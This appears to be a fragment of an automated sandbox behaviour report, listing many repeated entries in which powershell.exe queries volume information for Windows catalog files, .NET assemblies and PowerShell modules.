        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
